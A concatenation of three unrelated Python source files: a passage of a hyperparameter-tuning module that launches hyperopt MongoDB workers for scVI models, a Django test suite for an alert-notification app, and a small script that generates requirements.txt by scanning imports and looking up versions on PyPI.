"reserve_timeout": reserve_timeout,
"workdir": mongo_path,
"mongo_port_address": mongo_port_address,
"multiple_hosts": multiple_hosts,
}
workers_thread = threading.Thread(
target=launch_workers, kwargs=launcher_kwargs, name="Worker Launcher"
)
workers_thread.start()
started_threads.append(workers_thread)
# wait for workers and fmin process simultaneously
workers_done_event = threading.Event()
fmin_done_event = threading.Event()
fmin_waiter = threading.Thread(
target=_wait_for_process_or_thread,
kwargs={"process": fmin_process, "event": fmin_done_event},
name="Waiter fmin",
)
fmin_waiter.start()
started_threads.append(fmin_waiter)
workers_waiter = threading.Thread(
target=_wait_for_process_or_thread,
kwargs={"process": workers_thread, "event": workers_done_event},
name="Waiter workers",
)
workers_waiter.start()
started_threads.append(workers_waiter)
while not workers_done_event.is_set() and not fmin_done_event.is_set():
time.sleep(5)
# when one of them finishes, if it is fmin -> trials should be in the queue
# if not and not using multiple hosts we wait fmin_timeout seconds for fmin to finish
# in any case, close waiter threads
if fmin_done_event.is_set():
logger.debug("Setting worker watchdog and waiter stop events.")
stop_watchdog_event.set()
workers_done_event.set()
if workers_done_event.is_set() and not multiple_hosts:
logger.debug("Setting fmin waiter stop event.")
fmin_done_event.set()
try:
        if multiple_hosts:
# if using multiple_hosts, there could still be workers -> disable fmin timeout
fmin_timeout = None
logger.debug(
"multiple_hosts set to True, fmin will block until all trials have been completed."
)
else:
logger.debug(
"multiple_hosts set to false, Fmin has {time} seconds to finish".format(
time=fmin_timeout
)
)
trials = queue.get(timeout=fmin_timeout)
except Empty:
logger.error(
"Queue still empty {fmin_timeout} seconds after all workers have died."
"\n".format(fmin_timeout=fmin_timeout) + "Terminating minimization process."
)
raise FminTimeoutError(
"Queue still empty {fmin_timeout} seconds after all workers "
"have died. Check that you have used a new exp_key or allowed "
"a higher max_evals".format(fmin_timeout=fmin_timeout)
)
# sanity: wait for fmin, terminate workers and wait for launcher
fmin_process.join()
stop_watchdog_event.set()
workers_thread.join()
logger.info(
"Finished minimization procedure for experiment {exp_key}.".format(
exp_key=exp_key
)
)
logger.debug("Terminating mongod process.")
mongod_process.terminate()
# cleanup processes, threads and files
_cleanup_processes_files()
return trials
@_cleanup_decorator
def _fmin_parallel(
queue: multiprocessing.Queue,
fn: Callable,
exp_key: str,
space: dict,
algo: Callable = tpe.suggest,
max_evals: int = 100,
fmin_timer: float = None,
show_progressbar: bool = False,
mongo_port_address: str = "localhost:1234/scvi_db",
):
"""Launches a ``hyperopt`` minimization procedure.
"""
logger.debug("Instantiating trials object.")
# instantiate Trials object
trials = MongoTrials(
as_mongo_str(os.path.join(mongo_port_address, "jobs")), exp_key=exp_key
)
# run hyperoptimization in another fork to enable the use of fmin_timer
fmin_kwargs = {
"fn": fn,
"space": space,
"algo": algo,
"max_evals": max_evals,
"trials": trials,
"show_progressbar": show_progressbar,
}
fmin_thread = threading.Thread(target=fmin, kwargs=fmin_kwargs)
logger.debug("Calling fmin.")
# set fmin thread as daemon so it stops when the main process terminates
fmin_thread.daemon = True
fmin_thread.start()
started_threads.append(fmin_thread)
if fmin_timer is not None:
        logger.debug(
"Timer set, fmin will run for at most {timer}".format(timer=fmin_timer)
)
start_time = time.monotonic()
run_time = 0
while run_time < fmin_timer and fmin_thread.is_alive():
time.sleep(10)
run_time = time.monotonic() - start_time
    else:
        logger.debug("No timer, waiting for fmin")
        while fmin_thread.is_alive():
            time.sleep(10)
logger.debug("fmin returned or timer ran out.")
# queue.put uses pickle so remove attribute containing thread.lock
if hasattr(trials, "handle"):
logger.debug("Deleting Trial handle for pickling.")
del trials.handle
logger.debug("Putting Trials in Queue.")
queue.put(trials)
def _wait_for_process_or_thread(
process: Union[multiprocessing.Process, threading.Thread], event: threading.Event
):
"""Waits for a process to finish - breaks and sets ``event`` when it does.
Can be terminated by setting event from outside or by setting the global ``cleanup_event`` of this module.
"""
logger.debug("Started waiting for {name}.".format(name=process.name))
while True:
# set event and break is process is dead
if not process.is_alive():
logger.debug("{name} died. Terminating waiter.".format(name=process.name))
event.set()
break
# break if event was set
if event.is_set():
logger.debug(
"Waiting event for {name} set from outside. "
"Terminating waiter.".format(name=process.name)
)
break
if cleanup_event.is_set():
logger.debug(
"Waiting thread for {name} cleaned up.".format(name=process.name)
)
event.set()
break
time.sleep(5)
@_cleanup_decorator
def launch_workers(
    stop_watchdog_event: threading.Event,
exp_key: str,
n_cpu_workers: int = None,
gpu_ids: List[int] = None,
n_workers_per_gpu: int = 1,
reserve_timeout: float = 30.0,
workdir: str = ".",
mongo_port_address: str = "localhost:1234/scvi_db",
multiple_hosts: bool = False,
):
"""Launches the local workers which are going to run the jobs required by the minimization process.
Terminates when the worker_watchdog call finishes.
Specifically, first ``n_gpu_workers`` are launched per GPU in ``gpu_ids`` in their own spawned process.
Then, ``n_cpu_workers`` CPU workers are launched, also in their own spawned process.
    The use of spawned processes (each having its own Python interpreter) is mandatory for compatibility with CUDA.
See https://pytorch.org/docs/stable/notes/multiprocessing.html for more information.
:param stop_watchdog_event: When set, this event stops the watchdog Thread
which checks that local workers are still running.
:param exp_key: This key is used by hyperopt as a suffix to the part of the MongoDb
which corresponds to the current experiment. In particular, it has to be passed to ``MongoWorker``.
:param n_cpu_workers: Number of cpu workers to launch. If None, and no GPUs are found,
defaults to ``os.cpu_count() - 1``. Else, defaults to 0.
:param gpu_ids: Ids of the GPUs to use. If None defaults to all GPUs found by ``torch``.
Note that considered gpu ids are int from ``0`` to ``torch.cuda.device_count()``.
    :param n_workers_per_gpu: Number of workers to launch per gpu found by ``torch``.
:param reserve_timeout: Amount of time, in seconds, a worker tries to reserve a job for
before throwing a ``ReserveTimeout`` Exception.
    :param workdir: Working directory in which the workers run their jobs.
:param mongo_port_address: Address to the running MongoDb service.
    :param multiple_hosts: ``True`` if launching workers from multiple hosts.
"""
# prepare parallel logging
_logging_queue = spawn_ctx.Queue()
listener = QueueListener(_logging_queue, DispatchHandler())
listener.start()
started_processes.append(listener)
if gpu_ids is None:
n_gpus = torch.cuda.device_count()
logger.debug(
"gpu_ids is None, defaulting to all {n_gpus} GPUs found by torch.".format(
n_gpus=n_gpus
)
)
gpu_ids = list(range(n_gpus))
if n_gpus and n_cpu_workers is None:
n_cpu_workers = 0
        logger.debug(
            "Some GPU(s) found and n_cpu_workers is None, defaulting to n_cpu_workers = 0"
        )
if not n_gpus and n_cpu_workers is None:
n_cpu_workers = os.cpu_count() - 1
        logger.debug(
            "No GPUs found and n_cpu_workers is None, defaulting to n_cpu_workers = "
"{n_cpu_workers} (os.cpu_count() - 1)".format(
n_cpu_workers=n_cpu_workers
)
)
if (
gpu_ids is None
and (n_cpu_workers == 0 or n_cpu_workers is None)
and not multiple_hosts
):
raise ValueError("No hardware (cpu/gpu) selected/found.")
# log progress with queue and progress_listener
progress_queue = spawn_ctx.Queue()
prog_listener_kwargs = {
"progress_queue": progress_queue,
"logging_queue": _logging_queue,
}
prog_listener = spawn_ctx.Process(
target=progress_listener, kwargs=prog_listener_kwargs, name="Progress listener"
)
prog_listener.start()
started_processes.append(prog_listener)
running_workers = []
# launch gpu workers
logger.info(
"Starting {n_workers_per_gpu} worker.s for each of the {n_gpus} gpu.s set for use/"
"found.".format(n_workers_per_gpu=n_workers_per_gpu, n_gpus=len(gpu_ids))
)
for gpu_id in gpu_ids:
for sub_id in range(n_workers_per_gpu):
worker_kwargs = {
"progress_queue": progress_queue,
"logging_queue": _logging_queue,
"exp_key": exp_key,
"workdir": workdir,
"gpu": True,
"hw_id": str(gpu_id),
"reserve_timeout": reserve_timeout,
"mongo_port_address": mongo_port_address,
}
p = spawn_ctx.Process(
target=hyperopt_worker,
kwargs=worker_kwargs,
name="Worker GPU " + str(gpu_id) + ":" + str(sub_id),
)
p.start()
running_workers.append(p)
# launch cpu workers
# TODO: add cpu affinity?
logger.info(
"Starting {n_cpu_workers} cpu worker.s".format(n_cpu_workers=n_cpu_workers)
)
for cpu_id in range(n_cpu_workers):
worker_kwargs = {
"progress_queue": progress_queue,
"logging_queue": _logging_queue,
"exp_key": exp_key,
"workdir": workdir,
"gpu": False,
"hw_id": str(cpu_id),
"reserve_timeout": reserve_timeout,
"mongo_port_address": mongo_port_address,
}
p = spawn_ctx.Process(
target=hyperopt_worker,
kwargs=worker_kwargs,
name="Worker CPU " + str(cpu_id),
)
# FIXME won't terminate if parent is killed (SIGKILL)
p.start()
running_workers.append(p)
started_processes.extend(running_workers)
# wait or return if all workers have died
workers_watchdog(running_workers=running_workers, stop_event=stop_watchdog_event)
logger.debug("Worker watchdog finished, terminating workers and closing listener.")
for worker in running_workers:
if worker.is_alive():
worker.terminate()
listener.stop()
prog_listener.terminate()
@_cleanup_decorator
def progress_listener(progress_queue, logging_queue):
"""Listens to workers when they finish a job and logs progress.
    Workers put an item in the progress_queue when they finish a job;
    each time they do, this function sends a log record to the progress logger.
"""
# write all logs to queue
root_logger = logging.getLogger()
root_logger.setLevel(logging.DEBUG)
queue_handler = QueueHandler(logging_queue)
queue_handler.setLevel(logging.DEBUG)
root_logger.addHandler(queue_handler)
logger.debug("Listener listening...")
progress_logger = logging.getLogger("progress_logger")
i = 0
while True:
# get job done signal
progress_queue.get()
i += 1
logger.info("{i} job.s done".format(i=i))
# update progress bar through ProgressHandler
progress_logger.info(None)
if cleanup_event.is_set():
break
def hyperopt_worker(
progress_queue: multiprocessing.Queue,
logging_queue: multiprocessing.Queue,
exp_key: str,
workdir: str = ".",
gpu: bool = True,
hw_id: str = None,
poll_interval: float = 1.0,
reserve_timeout: float = 30.0,
mongo_port_address: str = "localhost:1234/scvi_db",
):
"""Launches a ``hyperopt`` ``MongoWorker`` which runs jobs until ``ReserveTimeout`` is raised.
:param progress_queue: Queue in which to put None when a job is done.
:param logging_queue: Queue to send logs to using a ``QueueHandler``.
:param exp_key: This key is used by hyperopt as a suffix to the part of the MongoDb
which corresponds to the current experiment. In particular, it has to be passed to ``MongoWorker``.
    :param workdir: Working directory passed to the ``MongoWorker``.
    :param gpu: If ``True``, a GPU is used.
    :param hw_id: Id of the GPU to use, set via the env variable ``CUDA_VISIBLE_DEVICES``.
:param poll_interval: Time to wait between attempts to reserve a job.
:param reserve_timeout: Amount of time, in seconds, a worker tries to reserve a job for
before throwing a ``ReserveTimeout`` Exception.
    :param mongo_port_address: Address to the running MongoDb service.
"""
# write all logs to queue
root_logger = logging.getLogger()
root_logger.setLevel(logging.DEBUG)
queue_handler = QueueHandler(logging_queue)
queue_handler.setLevel(logging.DEBUG)
root_logger.addHandler(queue_handler)
logger.debug("Worker working...")
os.environ["CUDA_VISIBLE_DEVICES"] = hw_id if gpu else str()
    # FIXME is this still necessary?
sys.path.append(".")
mjobs = MongoJobs.new_from_connection_str(
os.path.join(as_mongo_str(mongo_port_address), "jobs")
)
mworker = MongoWorker(mjobs, float(poll_interval), workdir=workdir, exp_key=exp_key)
while True:
# FIXME we don't protect ourselves from memory leaks, bad cleanup, etc.
try:
mworker.run_one(reserve_timeout=float(reserve_timeout))
progress_queue.put(None)
except ReserveTimeout:
logger.debug(
"Caught ReserveTimeout. "
"Exiting after failing to reserve job for {time} seconds.".format(
time=reserve_timeout
)
)
break
def workers_watchdog(
    running_workers: List[multiprocessing.Process], stop_event: threading.Event
):
"""Checks that workers in running_workers are stil running.
If none are running anymore, inform user and finish.
"""
while True:
one_alive = False
for worker in running_workers:
one_alive = one_alive or worker.is_alive()
# if all workers are dead, inform user
if not one_alive:
logger.debug(
"All workers have died, check stdout/stderr for error tracebacks."
)
break
if stop_event.is_set():
logger.debug("Stopping Event set, stopping worker watchdog.")
break
if cleanup_event.is_set():
logger.debug("Cleaning up Event set, stopping worker watchdog.")
stop_event.set()
break
time.sleep(5)
def _objective_function(
space: dict,
gene_dataset: GeneExpressionDataset,
model_class: Type[VAE] = VAE,
trainer_class: Type[Trainer] = UnsupervisedTrainer,
model_specific_kwargs: dict = None,
trainer_specific_kwargs: dict = None,
train_func_specific_kwargs: dict = None,
use_batches: bool = False,
is_best_training: bool = False,
) -> Union[Dict[str, Any], Trainer]:
"""Objective function for automatic hyperparameter optimization.
Train a scVI model and return the best value of the early-stopping metric (e.g, log-likelihood).
Convention: fixed parameters (no default) have precedence over tunable parameters (default).
:param space: dict containing up to three sub-dicts with keys "model_tunable_kwargs",
"trainer_tunable_kwargs" or "train_func_tunable_kwargs".
Each of those dict contains hyperopt defined parameter spaces (e.g. ``hp.choice(..)``)
which will be passed to the corresponding object : model, trainer or train method
when performing hyperoptimization.
:param gene_dataset: scVI gene dataset
:param model_class: scVI model class (e.g ``VAE``, ``VAEC``, ``SCANVI``)
:param trainer_class: Trainer class (e.g ``UnsupervisedTrainer``)
:param model_specific_kwargs: dict of fixed parameters which will be passed to the model.
:param trainer_specific_kwargs: dict of fixed parameters which will be passed to the trainer.
:param train_func_specific_kwargs: dict of fixed parameters which will be passed to the train method.
:param use_batches: If False, pass n_batch=0 to model else pass gene_dataset.n_batches
:param is_best_training: True if training the model with the best hyperparameters
:return: best value of the early stopping metric, and best model if is_best_training
"""
start_time = time.monotonic()
# hyperopt params
space = defaultdict(dict, space)
model_tunable_kwargs = space["model_tunable_kwargs"]
trainer_tunable_kwargs = space["trainer_tunable_kwargs"]
train_func_tunable_kwargs = space["train_func_tunable_kwargs"]
# use_cuda default
if "use_cuda" not in trainer_specific_kwargs:
trainer_specific_kwargs["use_cuda"] = bool(torch.cuda.device_count())
if "n_epochs" not in {**train_func_specific_kwargs, **train_func_tunable_kwargs}:
train_func_specific_kwargs["n_epochs"] = 1000
# add hardcoded parameters
# disable scVI progbar
trainer_specific_kwargs["show_progbar"] = False
if is_best_training:
trainer_specific_kwargs["train_size"] = 1.0
# no monitoring, will crash otherwise
trainer_specific_kwargs["frequency"] = None
trainer_specific_kwargs["early_stopping_kwargs"] = {}
else:
# evaluate at each epoch
trainer_specific_kwargs["frequency"] = 1
# merge params with fixed param precedence
model_tunable_kwargs.update(model_specific_kwargs)
trainer_tunable_kwargs.update(trainer_specific_kwargs)
train_func_tunable_kwargs.update(train_func_specific_kwargs)
if not is_best_training:
logger.info(
"Parameters being tested: \n"
"model: \n"
+ str(model_tunable_kwargs)
+ "\n"
+ "trainer: \n"
+ str(trainer_tunable_kwargs)
+ "\n"
+ "train method: \n"
+ str(train_func_tunable_kwargs)
)
# define model
logger.debug("Instantiating model")
model = model_class(
n_input=gene_dataset.nb_genes,
n_batch=gene_dataset.n_batches * use_batches,
**model_tunable_kwargs,
)
# define trainer
logger.debug("Instantiating trainer")
trainer = trainer_class(model, gene_dataset, **trainer_tunable_kwargs)
# train model
logger.debug("Starting training")
trainer.train(**train_func_tunable_kwargs)
logger.debug("Finished training")
elapsed_time = time.monotonic() - start_time
# if training the best model, return model else return criterion
if is_best_training:
return trainer
else:
# select metric from early stopping kwargs if possible
metric = None
early_stopping_kwargs = trainer_specific_kwargs.get(
"early_stopping_kwargs", None
)
if early_stopping_kwargs is not None:
metric = early_stopping_kwargs.get("early_stopping_metric", None)
# store run results
if metric is not None:
early_stopping_loss_is_best = True
best_epoch = trainer.best_epoch
# add actual number of epochs to be used when training best model
space["train_func_tunable_kwargs"]["n_epochs"] = best_epoch
early_stopping_loss = trainer.early_stopping.best_performance
metric += "_" + trainer.early_stopping.on
# default to elbo
else:
early_stopping_loss_is_best = False
metric = "elbo_test_set"
early_stopping_loss = trainer.history[metric][-1]
best_epoch = len(trainer.history[metric])
# compute true ll
loss = trainer.test_set.marginal_ll(n_mc_samples=100)
logger.debug(
"Training of {n_epochs} epochs finished in {time} with loss = {loss}".format(
n_epochs=len(trainer.history[metric]),
time=str(datetime.timedelta(seconds=elapsed_time)),
loss=loss,
)
)
# check status
status = STATUS_OK
if np.isnan(loss):
status = STATUS_FAIL
return {
"loss": loss,
"early_stopping_loss": early_stopping_loss,
"early_stopping_loss_is_best": early_stopping_loss_is_best,
"best_epoch": best_epoch,
"elapsed_time": elapsed_time,
"status": status,
"history": trainer.history,
"space": space,
"worker_name": multiprocessing.current_process().name,
}
|
tests.py
|
import time
from uuid import uuid1
from datetime import datetime, timedelta
from threading import Thread
from django.test import TestCase, TransactionTestCase
from django.contrib.auth.models import User, Group
from django.core import management, mail
from django.core.mail import send_mail
from django.conf import settings
from django.db.models.signals import post_save
from alert.utils import BaseAlert, ALERT_TYPES, BaseAlertBackend, ALERT_BACKENDS,\
super_accepter, unsubscribe_user
from alert.exceptions import AlertIDAlreadyInUse, AlertBackendIDAlreadyInUse, CouldNotSendError
from alert.models import Alert, AlertPreference, AdminAlert
from alert.forms import AlertPreferenceForm, UnsubscribeForm
from alert.signals import admin_alert_saved
from alert.admin import AdminAlertAdmin
class SubclassTestingAlert(BaseAlert):
"""
This will never send any alerts - it's just a check to make sure that
subclassing alerts doesn't explode
"""
title = 'Welcome new users'
description = 'When a new user signs up, send them a welcome email'
signal = post_save
sender = User
default = True
def before(self, **kwargs):
return False
def get_applicable_users(self, instance, **kwargs):
return [instance]
class WelcomeAlert(SubclassTestingAlert):
"""
everything is inherited from SubclassTestingAlert
only change is that alerts will actually be sent
"""
def before(self, created, **kwargs):
return created
class DummyBackend(BaseAlertBackend):
title = "Dummy"
def send(self, alert):
pass
class EpicFailBackend(BaseAlertBackend):
"""
Backend that fails to send on the first try for every alert
"""
id = "EpicFail"
title = "Epic Fail"
def send(self, alert):
if not alert.failed:
raise CouldNotSendError
class SlowBackend(BaseAlertBackend):
"""
Backend that takes a full second to send an alert
"""
title = "Slow backend"
def send(self, alert):
time.sleep(1)
send_mail("asdf", 'woot', 'fake@gmail.com', ['superfake@gmail.com'])
#################################################
### Tests ###
#################################################
class AlertTests(TestCase):
def setUp(self):
pass
def test_alert_creation(self):
username = str(uuid1().hex)[:16]
email = "%s@example.com" % username
user = User.objects.create(username=username, email=email)
alerts = Alert.objects.filter(user=user)
self.assertEqual(len(alerts), len(ALERT_BACKENDS))
for alert in alerts:
self.assertEqual(alert.alert_type, "WelcomeAlert")
if alert.backend == 'EmailBackend':
self.assertEqual(alert.title, "email subject")
self.assertEqual(alert.body, "email body")
else:
self.assertEqual(alert.title, "default title")
self.assertEqual(alert.body, "default body")
def test_alert_registration_only_happens_once(self):
self.assertTrue(isinstance(ALERT_TYPES["WelcomeAlert"], WelcomeAlert))
        self.assertEqual(len(ALERT_TYPES), 3)
def define_again():
class WelcomeAlert(BaseAlert):
title = 'Welcome new users'
signal = post_save
self.assertRaises(AlertIDAlreadyInUse, define_again)
def test_alert_id_is_key_in_ALERT_TYPES(self):
for key, alert in ALERT_TYPES.items():
self.assertEqual(key, alert.id)
class AlertBackendTests(TestCase):
def setUp(self):
username = str(uuid1().hex)[:16]
email = "%s@example.com" % username
self.user = User.objects.create(username=username, email=email)
def test_backend_creation(self):
self.assertTrue(isinstance(ALERT_BACKENDS["DummyBackend"], DummyBackend))
def test_backends_use_supplied_id(self):
self.assertTrue(isinstance(ALERT_BACKENDS["EpicFail"], EpicFailBackend))
def test_pending_manager(self):
self.assertEqual(Alert.pending.all().count(), len(ALERT_BACKENDS))
management.call_command("send_alerts")
self.assertEqual(Alert.pending.all().count(), 1)
def test_backend_registration_only_happens_once(self):
        self.assertEqual(len(ALERT_BACKENDS), 4)
def define_again():
class DummyBackend(BaseAlertBackend):
title = 'dummy'
self.assertRaises(AlertBackendIDAlreadyInUse, define_again)
def test_backend_fails_to_send(self):
alert_that_should_fail = Alert.objects.filter(backend='EpicFail')[0]
before_send = datetime.now()
alert_that_should_fail.send()
after_send = datetime.now()
self.assertTrue(alert_that_should_fail.failed)
self.assertFalse(alert_that_should_fail.is_sent)
self.assertTrue(alert_that_should_fail.last_attempt is not None)
self.assertTrue(alert_that_should_fail.last_attempt > before_send)
self.assertTrue(alert_that_should_fail.last_attempt < after_send)
# and now retry
before_send = datetime.now()
alert_that_should_fail.send()
after_send = datetime.now()
self.assertFalse(alert_that_should_fail.failed)
self.assertTrue(alert_that_should_fail.is_sent)
self.assertTrue(alert_that_should_fail.last_attempt is not None)
self.assertTrue(alert_that_should_fail.last_attempt > before_send)
self.assertTrue(alert_that_should_fail.last_attempt < after_send)
class ConcurrencyTests(TransactionTestCase):
def setUp(self):
username = str(uuid1().hex)[:16]
email = "%s@example.com" % username
self.user = User.objects.create(username=username, email=email)
def testMultipleSimultaneousSendScripts(self):
# Sqlite uses an in-memory database, which does not work with the concurrency tests.
if "sqlite" in settings.DATABASES['default']['ENGINE']:
# Note that the alert django app will work fine with Sqlite. It's only the
            # concurrency *tests* that do not work with sqlite.
return
self.assertEqual(len(mail.outbox), 0)
threads = [Thread(target=management.call_command, args=('send_alerts',)) for i in range(100)]
for t in threads:
t.start()
# space them out a little tiny bit
time.sleep(0.001)
[t.join() for t in threads]
self.assertEqual(len(mail.outbox), 2)
class EmailBackendTests(TestCase):
def setUp(self):
pass
class FormTests(TestCase):
def setUp(self):
self.user = User.objects.create(username='wootz', email='wootz@woot.com')
def testNoArgs(self):
        self.assertRaises(TypeError, AlertPreferenceForm)
        self.assertRaises(TypeError, UnsubscribeForm)
def testSimpleCase(self):
pref_form = AlertPreferenceForm(user=self.user)
unsubscribe_form = UnsubscribeForm(user=self.user)
self.assertEqual(len(pref_form.fields), len(ALERT_TYPES) * len(ALERT_BACKENDS))
self.assertEqual(len(unsubscribe_form.fields), len(ALERT_TYPES) * len(ALERT_BACKENDS))
def testUnsubscribeFormHasNoVisibleFields(self):
from django.forms import HiddenInput
unsubscribe_form = UnsubscribeForm(user=self.user)
for field in unsubscribe_form.fields.values():
self.assertTrue(isinstance(field.widget, HiddenInput))
def testSuperAccepterNone(self):
types = super_accepter(None, ALERT_TYPES)
backends = super_accepter(None, ALERT_BACKENDS)
self.assertEqual(len(types), len(ALERT_TYPES))
self.assertEqual(len(backends), len(ALERT_BACKENDS))
def testSuperAccepterSingle(self):
backends_by_class = super_accepter(EpicFailBackend, ALERT_BACKENDS)
backends_by_id = super_accepter("EpicFail", ALERT_BACKENDS)
self.assertEqual(len(backends_by_class), 1)
self.assertEqual(len(backends_by_id), 1)
self.assertEqual(backends_by_class, backends_by_id)
def testSuperAccepterList(self):
backends_by_class = super_accepter([EpicFailBackend, DummyBackend], ALERT_BACKENDS)
backends_by_id = super_accepter(["EpicFail", "DummyBackend"], ALERT_BACKENDS)
backends_by_mixed = super_accepter(["EpicFail", DummyBackend], ALERT_BACKENDS)
self.assertEqual(len(backends_by_class), 2)
self.assertEqual(len(backends_by_id), 2)
self.assertEqual(len(backends_by_mixed), 2)
self.assertEqual(backends_by_class, backends_by_id)
self.assertEqual(backends_by_class, backends_by_mixed)
self.assertEqual(backends_by_mixed, backends_by_id)
def testSuperAccepterDuplicates(self):
backends = super_accepter([EpicFailBackend, DummyBackend, "EpicFail"], ALERT_BACKENDS)
self.assertEqual(len(backends), 2)
def testUnsubscribe(self):
details = {
"alert_type": WelcomeAlert.id,
"backend": EpicFailBackend.id,
"user": self.user,
}
AlertPreference.objects.create(preference=True, **details)
self.assertEqual(AlertPreference.objects.get(**details).preference, True)
unsubscribe_user(self.user, alerts=WelcomeAlert, backends=EpicFailBackend)
self.assertEqual(AlertPreference.objects.get(**details).preference, False)
class AdminAlertTests(TestCase):
def setUp(self):
group = Group.objects.create(name='test_group')
self.admin_alert = AdminAlert(
title="Hello users!",
body="woooord!",
recipients=group
)
def send_it(self):
AdminAlertAdmin.save_model(AdminAlertAdmin(AdminAlert, None), None, self.admin_alert, None, None)
def testDraftMode(self):
self.admin_alert.draft = True
self.send_it()
self.assertEqual(Alert.objects.count(), 0)
self.send_it()
self.assertEqual(Alert.objects.count(), User.objects.count())
def testScheduling(self):
send_at = datetime.now() + timedelta(days=1)
self.admin_alert.send_at = send_at
self.send_it()
for alert in Alert.objects.all():
self.assertEqual(alert.when, send_at)
def testOnlySendOnce(self):
self.assertFalse(self.admin_alert.sent)
self.send_it()
self.assertTrue(self.admin_alert.sent)
alert_count = Alert.objects.count()
self.send_it()
self.assertEqual(alert_count, Alert.objects.count())
|
simplepipreqs.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from pathlib import Path
import subprocess
from yarg import json2package
from yarg.exceptions import HTTPError
import requests
import argparse
import os
import sys
import json
import threading
import itertools
import time
try:
from pip._internal.operations import freeze
except ImportError: # pip < 10.0
from pip.operations import freeze
def get_installed_packages(pip_version: str = "pip"):
installed_with_versions = []
installed = []
stdout, stderr = subprocess.Popen(
[pip_version, "freeze"], stdout=subprocess.PIPE, stderr=subprocess.STDOUT).communicate()
for i in stdout.splitlines():
installed_with_versions.append(i.decode("utf-8"))
installed.append(i.decode("utf-8").split('==')[0])
return installed_with_versions, installed
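# Hedged example of the return format (package names and versions below are
# illustrative only):
#   installed_with_versions -> ["requests==2.25.1", "yarg==0.1.9", ...]
#   installed               -> ["requests", "yarg", ...]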
def get_version_info(module: str, pypi_server: str = "https://pypi.python.org/pypi/", proxy=None):
try:
response = requests.get(
"{0}{1}/json".format(pypi_server, module), proxies=proxy)
if response.status_code == 200:
if hasattr(response.content, 'decode'):
data = json2package(response.content.decode())
else:
data = json2package(response.content)
        else:
raise HTTPError(status_code=response.status_code,
reason=response.reason)
except HTTPError:
return None
return str(module) + '==' + str(data.latest_release_id)
def get_project_imports(directory: str = os.curdir):
modules = []
for path, subdirs, files in os.walk(directory):
for name in files:
if name.endswith('.py'):
# print(path)
with open(os.path.join(path, name)) as f:
contents = f.readlines()
for lines in contents:
words = lines.split(' ')
if 'import' == words[0] or 'from' == words[0]:
line_module = words[1].split('.')[0].split(',')
for module in line_module:
module = module.split('\n')[0]
if module and module not in modules:
modules.append(module)
# print('found {} in {}'.format(module,name))
elif name.endswith('.ipynb'):
with open(str(Path(os.path.join(path, name)).absolute())) as f:
contents = f.readlines()
listToStr = ' '.join([str(elem) for elem in contents])
contents = json.loads(listToStr)
# contents = json.loads(Path(os.path.join(path, name)).absolute().read_text())
for cell in contents["cells"]:
for line in cell["source"]:
words = line.split(' ')
if 'import' == words[0] or 'from' == words[0]:
line_module = words[1].split('.')[0].split(',')
for module in line_module:
module = module.split('\n')[0]
if module and module not in modules:
modules.append(module)
# print('found {} in {}'.format(module, name))
return modules
def init(args):
done_imports = False
def animate_imports():
for c in itertools.cycle(['|', '/', '-', '\\']):
if done_imports:
break
print('Getting imports ' + c, end="\r")
sys.stdout.flush()
time.sleep(0.1)
t_imports = threading.Thread(target=animate_imports)
print()
t_imports.start()
output_text = []
modules = get_project_imports(
) if args['path'] is None else get_project_imports(args['path'])
installed_with_versions, installed = get_installed_packages(
"pip3") if args['version'] is None else get_installed_packages(args['version'])
done_imports = True
time.sleep(0.2)
done_versions = False
def animate_versions():
for c in itertools.cycle(['|', '/', '-', '\\']):
if done_versions:
print("\033[A \033[A")
break
print('Getting versions ' + c, end="\r")
sys.stdout.flush()
time.sleep(0.1)
t_versions = threading.Thread(target=animate_versions)
t_versions.start()
for mod in modules:
if mod in installed:
mod_info = get_version_info(mod)
if mod_info:
output_text.append(mod_info)
done_versions = True
time.sleep(0.2)
    print('\nGenerating requirements.txt ... ')
if args['path']:
with open(args['path'] + "/requirements.txt", 'w') as f:
f.write("\n".join(map(str, list(set(output_text)))))
print("Successfuly created/updated requirements.txt")
else:
with open("requirements.txt", 'w') as f:
f.write("\n".join(map(str, list(set(output_text)))))
print("Successfuly created/updated requirements.txt")
print()
def main():
ap = argparse.ArgumentParser()
ap.add_argument("-v", "--version", type=str, help="Pip version")
ap.add_argument("-p", "--path", type=str, help="Path to target directory")
args = vars(ap.parse_args())
try:
init(args)
except KeyboardInterrupt:
sys.exit(0)
if __name__ == '__main__':
main()
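# Hedged usage note (illustrative): typical invocations of this script.
#   python simplepipreqs.py                  # scan the current directory
#   python simplepipreqs.py -p ./my_project  # scan a specific directory
#   python simplepipreqs.py -v pip3          # use a specific pip for `freeze`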
|